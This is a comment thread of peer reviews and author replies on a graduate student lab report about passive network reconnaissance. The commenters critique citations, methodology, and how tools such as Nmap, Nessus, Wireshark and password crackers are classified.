May 13, 2025

12 thoughts on “TECH 581 W Computer Network Operations: Laboratory 3, Team 3

  1. This group did not follow the requirements for post submission. The tags were not included. In the abstract, the group mentions creating a definition of active reconnaissance. This should have done in the second lab report. The group should be looking at creating a definition of passive reconnaissance. APA 5th edition citations were not used in the literature review. You need to have author name, year, and page number. In the abstract, the group talks about ‘meta exploit’ I think they meant meta sploit. The literature review was not cohesive. The literature review read like a list. First the group discusses one article, goes through the list of questions that were required to answer. Then the group moves on to the next article and goes through the same list of questions. In the second article by Godefroid, the group used many lines from the article, and I see no citations for the direct lines from it. Unlike the first article the group talked to, the review of Godefroid’s article was not reviewed very thoroughly. None of the questions were answered that are required. The group should have gone into more detail about Godefroid’s article. I would like to have seen the group research into the conference that Godefroid presented this proposal at. This would be part of the literature review into the supporting data of the article.
    It was interesting to see that this group decided to not use the Citrix environment and used their own ‘real’ equipment. I think that the group should have at least attempted to use the Citrix environment for this lab. From the other group’s reviews, they were all able to perform this part of the lab using the environment. I would liked to have seen more detail in the methodology section so that this lab report could be handed over to other people and have them be able to recreate the same process and perform the lab experiment. For some reason the group decided to have each part of the lab experiment to have a separate results section. For more cohesiveness, the group should put all of the issues or problems into one paragraph. I do not feel there is a need to have any issues separated by parts. Citations found in the results and discussion, like the literature review did not follow the APA 5th edition format. I found that conclusions were discussed in the results section of the lab report. As far as the table is concerned, I do not see how vendor instructions can be considered to be kinetic. I hope the group can further clarify this for me in a comment to this. I would also like to see how the group defined stealth as a layer 8 attack tool. I think stealth can be passive or active. I can sneak around and punch someone, as long as I was stealthy. One more thing I would like to have seen the screenshots from their procedures.

  2. The introduction section for this lab report was excellently written and set out the principles that would be considered in the lab write up in terms of scope and definition. I was hoping this would lead into a literature review of passive reconnaissance terminology and literature. The literature review only addresses each of the articles given out with the lab exercises. While they are each evaluated extensively with analysis of the methods and application to the lab exercises of the course, they aren’t contrasted against each other. Missing from the literature review is any other discussion on other methods of passive reconnaissance.

    The methodology for part one only discusses breaking down the list created in lab one and categorizing the tools that were found in that list. It would’ve been nice to see some other sources evaluated. The writeup for 2a was detailed but didn’t talk enough about how the traffic between the two segments was going to be configured so that the “observer” could see the entire “conversation” between the two hosts. The method of searching security lists and bug tracker databases was innovative, web searches didn’t turn up much and I hadn’t thought about those sources.

    I disagree with the classification of password crackers as reconnaissance in the results. Grabbing the password off of the wire would be passive in nature and classify as reconnaissance but cracking an encrypted password grabbed off the wire falls out of the realm of reconnaissance into simply cracking. This section also mentions the use of digital forensic tools and that since they can be used in such a way they leave “little trace of the event” they can be considered passive. I believe the observer effect comes in to play when dealing with manipulating files on a machine you have physical access to. Simply loading the tool fundamentally alters the state of the machine such that the activity can be considered active.

    The findings of part 2b opens like a literature
    review. Would’ve been good to see it further up and contrasted against the other types of passive reconnaissance. The mention of the “many eyes” principle when talking about source code and cryptography shows a good depth of research that should be discussed in the literature review. The findings cover a wide range of issues regarding the issue of possibly malicious exploit tools, one that is missing is monitoring the output of the tool. Sandboxing is mentioned but with no specific details as to what would be monitored, if a tool is maliciously sending data to its author, this would be a channel that could be monitored and scrutinized.

    In the findings for 2b, source code auditing is mentioned along with the many eyes principle. In the table created for part 1 of the lab, blueprints are mentioned as a layer one exploit tool. Would source code fit in this category as well? Certainly if you can review the code for errors or security flaws from a defensive perspective, it could also be done from an offensive perspective.

  3. Team three presented an abstract that was complete and within the bounds of the syllabus, it did not meet the length requirements, but otherwise explained what was going to be performed in the lab, and did not read as a list of objectives. I agree with the introduction, and consider it to be the best introduction in the group of lab three assignments. Team three explains the definition of passive recon in terms of active recon and how, and how they differ. This makes for an approach that while requiring the reader to understand the previous lab does aid in understanding. I find it simpler to understand active recon over passive recon and this explanation can be rather beneficial. Team three then goes on to present their review of the literature of the week. Since there were only two articles to be read for this week, creating a cohesive literature review should be a simple task, however team three’s literature review is nothing more than a list of readings with APA five citations. The literature review does cover both articles, and relates them to the lab as well as answer the questions in the syllabus, however it cannot be ignored that there is no cohesion between the articles themselves leaving their analysis lacking. After the literature review team three follows the lab format provided in the syllabus and lists their methods. Their methods do show the strategy and technique that team three followed to complete their lab. However the methods themselves are broken into sections that correspond to the sections of lab design document. There is no unification in team three’s methods causing them to appear to lack academically. Team three presents their findings in the same manor as their methods, split by lab section. In part one they explain their reasoning for selecting the tools they selected as passive based on the definition presented in the introduction. While I agree with their definition, and see how they follow that definition to their results, but must disagree with some of those part one findings. They list password-cracking tools that perform offline cracking after gathering file data from a target system through either packet captures or booting a target system from a Linux live boot disk and gathering the file data in that manor. I question that approach as being passive, physical access to a system and performing a boot from live boot media would cause someone other than the attacker to notice thereby increasing risk and becoming an active recon tool. I agree with team three’s findings in sections two-A and two-B. However, as stated above, the findings, as well as issues sections are not unified. This is outside the format of the syllabus, and does not present a lab that is academic in nature. I agree with the conclusions drawn by team three, especially with the UNIX systems bias in NMAP and Nessus. This is in direct disagreement with team one, and leaves me questing that team’s findings. In team three’s passive recon table I see netstumbler and aircrack listed in layer one. I question this placement of the tools. 802.11 while explaining the use of radio as a transmission medium, is primarily a layer 2 technology. Finally, in layer 8, they list stealth as a passive recon tool. While I understand the placement, stealth seems to me to be a tool that aids passive recon not a tool that performs passive recon.

  4. This group wrote a good abstract however did they mean meta sploit instead of meta exploit? I also liked their introduction. This group did not seem to follow the requirements for post submission. I noticed in their literature review that they only used page numbers in their citations. They need to make sure they include the author, year, and page number.APA 5th edition citations were not used in the literature review. The literature reviews were not very thorough and none of the required questions were answered. I did like that they separated parts 2A and 2B; however it was confusing how they listed their results after each part instead of into one section. They listed tools that have been exploited but I did not see any specific case studies.
    I find it hard to believe that they couldn’t find any incidents (cases) relating to penetration tools being exploited.

  5. This group’s abstract very briefly explains the purpose of this lab. Then the abstract goes into explaining the different parts of the lab. Parts of the abstract look like they were taken from the last lab and not changed. This abstract talks about the lab being about active reconnaissance when it is actually about passive reconnaissance. Next the group gives an introduction to the lab. In the introduction the group starts off nicely by tying this lab into the last. They introduce three properties of passive reconnaissance, just as they did with the last lab on active reconnaissance. The three properties that the group gives to passive reconnaissance are: uncertainty, invariant risk, and limit of scope. They then go into explaining each of the properties in detail comparing them to the properties of active tools given in the last lab. These properties were a nice addition to the lab paper. They add more to the explanation of both the active and passive tools used in these labs. The group then ties their explanation of passive reconnaissance tools into the lab and describes each step briefly. Next the group goes into their literature review of the articles given in the lab. The group starts off giving a good summery of Privacy Oracle: a System for Finding Application Leaks with Black Box Differential Testing (Jang, et al, 2008). They then give a good explanation of the methodology of the paper by explaining how they did tests using the Privacy Oracle program as the blackbox, Wireshark to capture the output, and AutoIT to generate inputs to Privacy Oracle. The group then does a decent job of tying the article into the lab. The group then talks about the paper Random Testing for Security: Blackbox vs. Whitebox Fuzzing (Godefoird, 2007). They do a nice job on explaining what the paper was about and how it will tie into this lab. The problem with this groups literature reviews is that they are missing a few things. In each review the group does not talk about the theme or topic of the article, the research question, research data, or any errors or omissions. As for Godefoird’s paper, it is missing a lot of things and the group did not touch on these. Next the group starts in on methods of the lab. They start by explaining that they created a table of passive tools, from the table created in the first lab, using the definition of a passive tool defined in the introduction of this paper. Then the group explains how they tested some of the tools and finally how slowing tools down can reclassify them as passive. The group then explains part 2a of the lab. In this explanation the group does a very nice job of explaining how the whole scenario was set up. The group used their own network setup instead of the provided Citrix network due to its cumbersome nature. The group then explained how the test was set up on three machines. The group explains how the test was carried out but does not give details on how each program was set up for the test. The explanation of how the test was put together was very good but lacked in details like what commands were used in Nessus and Nmap and how Wireshark’s filters were set up. The group then explained how research was done to locate information on compromised network security tools. They explain that the information was not found easily until they looked into security issues and bug tracking sites. They gathered a good sampling of tools for examination. They also did research on the Open Source movement and comparisons were made against the practices of proprietary software vendors. Last they did research on code review techniques and safe methods of software deployment. Next the group discussed their results of each part of the lab. They started with the generation of the passive tool table. They explain that they found that sniffers did not add to the network traffic and that scanners did add to the traffic and could be detected. The group did a nice job in giving examples in each of these. Then the group does a great job in explaining the differences in types of ways that information can be obtained on a network and classifies them either active reconnaissance or passive reconnaissance. They use the example of gaining passwords using the different types of information gathering. They also talk about other tools that gather information and classify them also. I think that the group did a nice job of further explaining the differences between active and passive tools, but did not need to go into as much details on the active tools. Then in the last section of part one the group talks about how slowing down an active tool could turn an active tool into a passive tool. The group does a nice job in explaining how this slowing of an active tool will move it from risk to invariant risk. I would still say that the tool is still classified as an active tool though, because each packet that is sent out to the target is still seen by the target and the series of packets could (even if it is most unlikely) even be seen as an aggressive scan of the network if looked into further. The target still can detect the attack even though it might not determine it to be a risk. On the other hand you do have a point that the active tool would be viewed as a passive tool in that situation, but I would still classify it as an active tool and not a passive one. In the description of the results of part 2a the group talks about the results of the Nessus and Nmap scan of the target machine. They noticed that Nessus provided more information than Nmap even though Nmap gave more precise information. The group even made a discovery while doing the scans. They found that VMware had left some vulnerabilities on a Windows Vista machine after being uninstalled. The group then talked about how their set up of the third party observation of the scans did not provide the information they were expecting. This lack of information was due to their setup of their network on a switched network. In our set up we were able to capture any scan of any machine on the subnet and observe all the traffic sent from one to the other. They had similar results when running lanmap against their network. They then talk about how the passive analysis could have been done by introducing it onto an older hub base network or a wireless network. They go into an example of how a wireless network could be analyzed in a passive manner. The group then commented on how the exploits used in Nessus were classified into operating systems and services. This allows for a user to eliminate a large number of exploits just based on these criteria. The group then talks about how the Nessus and Nmap both have a bias toward UNIX based systems. They claim this is due to both these tools being UNIX based programs and that because of the UNIX-like distributions. Last in this part of the lab the group states that a vast majority of the tools in the Nessus tool reside in the top most layers of the OSI model. This, according to the group, is due to the issue of compounded complexity and that higher level services are subject to a greater variety of implementations. In this part of the lab the group did a great job in covering all the sections of this part of the lab. I didn’t find a lot that this group did wrong or left out. In the last part of the lab the group starts off with a nice introduction to the findings of this part of the lab. I really like the opening sentence. The group then claims that most exploit tools are open source. They say that so the discussion of security of open source tools comes down to a discussion of open source software in general. The group then goes on to show that the fight between the security of open source and proprietary software is split right down the middle. The group then comes up with a few cases of vulnerabilities in some tools but only claims that there was only one vague case of an exploited tool that they found, but do not tell what it was or explain it in any way. They conclude this section by saying that there is no reason to suspect that open source security tools present a greater risk than any other application. I think that this section was not looked into as thoroughly as it should have been. In our lab we were able to come up with a few exploited security tools. The group then does a nice job in giving some ways to ensure that the programs that are being used are not infected. Last in this section they give warning to give extra caution to any open source penetration tools compared to other software. Next the group covered some issues they had with installation of some of the software needed for the assignments. Last for the conclusion, the group wraps up what they learned in each section. It would have been nice to see some type of overall conclusion to this lab showing what they learned from the whole lab in general.

  6. Team three gave an overview of the lab within the abstract. However, I was somewhat unclear when they stated “First, we develop a definition of ‘active reconnaissance’ within the scope of network penetration attacks”, for this lab dealt with passive reconnaissance tools. The introduction cleared this confusion by stating “If it is possible to classify an ‘active’ reconnaissance tool, then to, it follows that a ‘passive’ reconnaissance tool must be subject to some similar definition.” Group three went on to say that passive tools consist of three characteristics, which include: uncertainty, invariant risk, and limit of scope.

    Team three’s methodology differed somewhat from that of the different teams. Team three installed the tools that were to be used in this lab on a real wired network setup, with actual physical host machines present. This method was chosen because as team three stated “This particular setup was chosen for ease of use (as the VMware Workstation setup over Citrix can become cumbersome to use) and ‘realness’ of application: we were not certain how precisely VMware’s virtual network hardware duplicates the characteristics of switched Ethernet LANs.”
    Team three differed from the other groups in that they classified offline password crackers as a passive tool. The rationale behind this classification was that “ ‘Offline’ password crackers require certain files to be extracted from the target machine or sniffed off of the network before being analyzed. Because of their lack of network activity, they are passive by nature.”Team three went on to include live discs as a passive reconnaissance tool. They stated” If physical access to the target machine is available, it’s possible to breech a Windows system using a Linux distribution on a bootable medium. From there, disk imaging, file carving, or simply copying select files can be accomplished with leaving little trace of the event.” Team three also stated that “an ‘active’ tool may approach ‘passive’ classification when its presence can no longer be identified on the network by a scanning signature alone: essentially a shift from a ‘risk’ to an ‘invariant risk’ characteristic classification.”

    Team three came to the same conclusion of team four about the biases of the Nessus and Nmap tools. Most of the other teams thought the tools were biased against windows, but teams three and four realized that the vast majority of plug-ins were for UNIX based systems. Team three went on to say “For instance, AIX, IBM’s commercial UNIX product, has a list of nearly five thousand vulnerabilities which are checked. Microsoft Windows, on the other hand, is evaluated against a list of about fourteen hundred.” Team three’s rationale for this phenomenon was “Both NMAP and NESSUS arose from within the UNIX-based community; therefore it is unsurprising that they remain largely UNIX-based tools with a ’server’ rather than a ‘workstation’ emphasis.”

    Team three found vulnerabilities in the Wireshark, Nessus, and Nmap tools and came to the conclusion that open source tools were no more insecure than proprietary tools.

    Team three did not include the risks running untested penetration testing tools could have on an enterprise network.

  7. Upon reading this groups lab I was pleased to see the detail taken with-in the lab. Let us start with the abstract, it was to the point and explain the overall concept of the lab and what was going to be done. Then we move onto the introduction of their lab. After reading the section it made me want to know is there an in between for passive an aggressive or is just black and white. Or is there a point where they switch back and forth. Would it be possible to make an argument that there are passive tools that can become active? Upon reading their definition for “passive” action creates no “new” risk above already existing. Is there a better explanation for these two types of attacks? Many sites describe passive attacks that do no damage and gather information (http://www.itglossary.net/passiveatt.html). Then aggressive attack is the opposite and is an attack that is meant to cause issues. Next onto the literature review, the students did a good job at reviewing the literature. There were still items that could have been added to the review such as comparing any arguments between the papers and questioning author decisions. Part of a literature review includes contrasting arguments and asking questions to get the most out of the papers or articles. Next was the methodology section and it was straight forward and described what they did within this portion of the labs. Next the results/ findings section, and one thing I wanted to know the students thoughts on using the tools outside the lab environment in a corporate setting. What tools do they think would be useful and non-hostile to the environment and then what tools maybe hostile and should be not be used. One such tool that probably would not be good as described within the lab would be Nessus. But why should it not be used besides the network traffic it gives off? Could a user other than the red team be using a packet analyzer and also gain the same information that is being tested for? I know vulnerabilities where found in both the windows environment and the UNIX environment but what where the different vulnerabilities? Where the ones on windows more serious than the UNIX vulnerabilities? Then came the issues section and their issues were described well. Lastly came the conclusion and it described what was done in the lab and what their views on this lab and how attacks should be handled. Overall they did a good job, and just putting some of their input of the authors and what they found will help readers understand their point of view. These will then lead to more discussion of not only the topic but on their views and make it a more interesting read.

  8. I think that group 3’s write-up for lab 3 was very good for most sections and fairly poor in others. The abstract and introduction for this lab was very good. The literary review was somewhat poor. Group 3 did not answer all of the required questions for the literature review. They did not explain the research methodology, if there were any errors or omissions in the readings, or whether or not they agreed with the readings. The group did, however, explain how the readings relate to the laboratory. All of the citing for the literary review was present, but not proper throughout the lab. The literature review was cited properly, except when including page numbers. The author and year of the reference should be included in addition to the page number. For part 2A, the lab envoironment was not setup as per the syllabus. While I don’t believe that the setup used (Windows Vista/FreeBSD) really changed the results, the Citrix environment should be used. If the group does not wish to use Citrix, then the correct virtual machines should be used and IP’d properly (statically and not via DHCP) to prevent confusion. Also the group indicates that they are unsure of the actual validity of VMware’s switching capabilities as opposed to using physical hardware. This brings up two questions. Did the group actually research this, and why couldn’t the group use the physical adapter on the host machine (ridged mode)? Is this any different than using the adapter from the host machine? In the results and discussions section for part one, the analysis was done very well. All of the questions for this section were answered and answered well. In the results and discussions section for part 2A, the analysis starts out well. Shortly after, there is an “interesting side note” that doesn’t relate to the laboratory and makes me wonder why they felt the need to include it. The group goes on to explain that the results of the test were disappointing, when it seems that the actual test is the disappointing part. The group was not able to capture the attack packets and did not include any analysis for why this is the case. The group hints at the possibility of different results on different hardware, but does not provide any depth to this theory. Does this depend on the switch being used? Does this mean that a NIC in promiscuous mode does NOT capture all packets on the LAN? What about mixing this with OTHER security tools (I believe this is the point of the lab)? Since the beginning of this course we have been researching security tools. Doesn’t a tool like Ettercap strike you as an important tool to try? If the packets are not being broadcast across the network, then what if the observer was in between the traffic (this is why it’s called a Man-In-The-Middle attack)? What traffic can you see when you ARP poison one-way? How about both ways? When discussing the biases in Nessus and Nmap, the group answered the question well. Also, their analysis of how these vulnerabilities fit into the grid was accurate as well. For the results of part 2B, the findings are discussed well and accurately answer all of the required questions. The issues and problems section was done well, with the exception of a part in 2A where the group indicates that the GUI version of Nmap is better, with no evidence of why. Is Nmap easier to script as a GUI application or as a console application by using a shell scripting language? The conclusion to this laboratory was also well done because it accurately sums up their procedures and findings.

  9. The team started with a strong abstract and indicating key points of there laboratory. They covered different tools that the team was going to use for scanning packets. There literature review was in very depth.
    Under the Methodology and Procedure for Part 2a the team reports using Windows XP 32bit Service Pack 3, Microsoft Windows Vista 32 bit Service Pack 2, and FreeBSD 7.1 Release i386. Lab 1 required the build of two Windows XP machines, one Windows Server machine, and one Linux machine. Simply wondering where the Windows Vista machine appeared and why? Was there a advantage in using Windows Vista or a Windows XP machine for this lab? Then the team talks about not using the Citrix virutal machine because it was becoming cumbersome, however this part is better suited in the problems and issues section of the lab. Like other teams Nessus and Nmap was combine into one system. The teams finds was very in depth, they broken up there finding into the difficult sections.
    The problems and issues section was broken up very nicely. The team had the main problems in part 2a. The team reports that the Nessus daemon was attempted to be installed on KnoppixSTD but failed. What was the error that was given? Did it simply just return a basic fail error, such as “this should never have happen” which appears when booting Backtrack into RAM with the machine have less then two gigs of RAM.

  10. Generally: the comments about the ‘active’ definition in the abstract; this was an editing error and should have read ‘passive.’ Apologies for any confusion this caused: it will be watched for in the future. To those who questioned the use of ‘real’ hosts and networks: I see no instruction which forbids this, and would argue a ‘real world’ based test ALWAYS trumps a simulation in credibility of experimental results, so why not use the better opportunity if available?

    @mvanbode, mafaulkn: The term ‘meta exploit’ is taken directly from the lab 3 instructions, it is in no way meant to refer to the ‘Metasploit’ framework.

    @mvanbode: The ‘Vendor Instructions’ (for SCADA devices: perhaps this should have been stated more clearly) are included in layer zero for the same reason ‘Specifications’ are included in layer one as ‘passive’ reconnaissance means. Installation manuals for devices such as these contain a wealth of information about device operation and setup, for example: http://www.hitachi-ds.com/en/download/plcmanuals/ . I believe much of this disagreement may be based around the ‘layer zero’ definition, which is really a philosophical dispute.

    @jverburg, nbakker in regards to ‘cracking’ and forensics: As I cannot directly perceive the information in the binary signal going down ‘the wire,’ I rely on such tools as Wireshark to ‘decrypt’ this information for me. I think this same relationship holds for the cracking of sniffed passwords, and therefore ‘crackers’ fit the same role Wireshark serves in reconnaissance. The forensic and boot disk tools, I admit, are controversial. If used on the target’s premises, I, too, would agree that they are ‘active.’ However, the only time I have ever used these tools has been in ‘cracking’ used workstations which I had acquired through legitimate means: workstations which were never wiped of the prior user’s data. I think this in an important ‘passive’ or ‘offline’ use of these tools in reconnaissance.

    @jverburg: Is source code similar to blueprints? Sure, in some ways; but I think UML documents are closer to blueprints than source code. Source code is the ‘boards and nails’ of software construction. If ‘source code’ is included as a passive tool, in which OSI layer does it belong? To further complicate the matter, the mixing of hardware function and software ‘code’ often becomes so blurred, that no practical difference exists: is microprocessor RTL a ‘source code’ or a hardware specification? Is human DNA a ‘program definition’ or a type of ‘biological hardware?’ Interesting question, I don’t know that I have an exact answer, however.

    @shumpfer: I think that I found a question about our definition of ‘passive’ presented, correct? Foremost, I must emphasize that we were defining ‘passive reconnaissance’ and not simply ‘passive,’ this is key in that ALL THREE criteria must be met in order for a tool to qualify in this category. Additionally, what exactly IS a ‘passive attack?’ It seems a strange union of antonymic terms. Finally, I found the definition referenced in the weblink to be so vague as to be unusable. What is the ‘system’ referred to in this definition? If it is the entire network and all hosts operating on it, consider that any host is changed simply by the act of running software. Would this then make Wireshark an ‘active attack’ as it is being run on a host in the ‘system?’ If I were to be pedantic, by quantum theory just the act of observing ‘changes the system,’ therefore it seems ‘passive reconnaissance’ is impossible from this definition, then.

    @prennick: I would judge a ‘man in the middle’ or ARP poisoning attack NOT to be passive reconnaissance methods, but active. Sure, we probably could have done a number of ‘active’ things to circumvent the switched network limitation, but that was not the point of this exercise in ‘passive reconnaissance’ of a running ‘active’ tool. If you use an active tool to monitor a running active tool, what have you gained? A single active tool without any ‘observer’ would be just as effective, with half of the risk. Additionally, do you really think it necessary to explain the difference ‘in hardware’ of switches versus hubs, or what broadcast and multicast packets are? Many of the ‘captive audience’ are IT professionals: I thought it might be pointless and even insulting to rehash such basic concepts. I felt we related only the necessary details, with the rest being ‘well understood’ by the target audience.

  11. @vanbode – Yep, we didn’t include the tags. Our bad. Did it cause you undue difficulty in finding the submission?. There were never any instructions that said Citrix HAD to be used, but I concede that results will vary with a different set up.

    @jverberg – yes, analyzing output from the tools would be another method of audit. I kind of thought of it as part of the sandbox process, but it is specific enough to be mentioned on its own. I disagree with my teammate about source code audit being layer one. I think that’s a good extension. I think that a case might be made for it at both layer one and layer 7 though.

    @nbakker – What is your obsession with abstract length?I can understand if you said that the lab is hard to read the way it is divided, but how is it not academic?

    @mafaulkn – you didn’t appear to find any cases of exploited tools either.

    @jeikenbe – why do you think it is that the Godefroid article is “missing” so many pieces? What exploited tools did you find? You discussed some vulnerabilities, but didn’t report any actual cases of exploitation. There’s a difference between potential and actual. Perhaps you should go back and reread section 2B again, you appear to have misunderstood it.

    @tnovosel – from our lab: “anything released into a production system untested may have catastrophic consequences.”

    @chaveza – please have someone review your writing before you submit it.

  12. I think it was interesting that the group in general jumped on switched network and either suggested the attack could go forward with ARP poisoning or could not go forward as it was not a broadcast domain. Thus in the latter case dismissing meta exploit (exploit of an exploit) without considering several interesting items of real world information technology infrastructures. In the first case wireless is a broadcast domain and unless traffic is fully encrypted can be subject to sniffing through wireless means. Further since wireless access points are “exposed” getting access to the wireless backbone could provide the equivalent of a broadcast domain. In general though there is some providence that must be accepted. In pyramid hierarchies of access to distribution to core of information technology infrastructures the higher you can find the more likely you will see the audit device. Auditors are primarily lazy and instead of moving around on a switch creating VLANS they will often find a central point to plug into and run all scans from that singular location. Their choice of procedure dictates a vulnerability to the passive scanner. In the end even a passive attack will often have some element of risk to detection. In some ways passive capability is trading off physical access and active capability is decreasing the need of that physical access.

Comments are closed.